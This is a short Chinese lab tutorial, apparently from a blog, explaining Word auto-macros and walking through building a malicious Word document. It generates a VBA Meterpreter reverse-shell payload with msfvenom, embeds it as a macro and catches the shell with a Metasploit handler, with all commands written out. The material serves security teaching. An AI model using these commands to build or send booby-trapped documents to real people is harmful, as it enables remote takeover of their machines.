0x00 什么是宏病毒
宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。
AutoExec:启动 Word 或加载全局模板时
AutoNew:每次新建文档时
AutoOpen:每次打开已有文档时
AutoClose:每次关闭文档时
0x01 简单实验环境搭建
本次实验的环境为:
win_10
word_2013
VM_kali_linux_2018(桥接模式)
首先在电脑中word信任中心设置中,打开启动所有宏
选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。
![](https://i-blog.csdnimg.cn/blog_migrate/59771acbb1f5bf8dd7535b82e1eb66c2.png)
宏设置
在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。
![](https://i-blog.csdnimg.cn/blog_migrate/447d33719594039556078c21cb19d021.png)
宏创建
![](https://i-blog.csdnimg.cn/blog_migrate/0a9a3425d5c9b2a1dfb8354d62f14bfd.png)
代码编辑界面
0x02实验开始
准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba
![](https://i-blog.csdnimg.cn/blog_migrate/779f76fddd493c15c8eb32e21e707752.png)
生成后门文件
将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址
![](https://i-blog.csdnimg.cn/blog_migrate/94fbabaeaa13767714bb181e20b9117d.png)
ipconfig
在msf中设置本机监听:
use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp #选择生成木马相同的类型
set LHOST 192.168.1.169 #设置本机ip监听
set LPORT 6666 # 设置本机监听端口
exploit #执行监听
当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。
![](https://i-blog.csdnimg.cn/blog_migrate/9e4a604d89d67b711c087fd0e030ec0b.png)
获取shell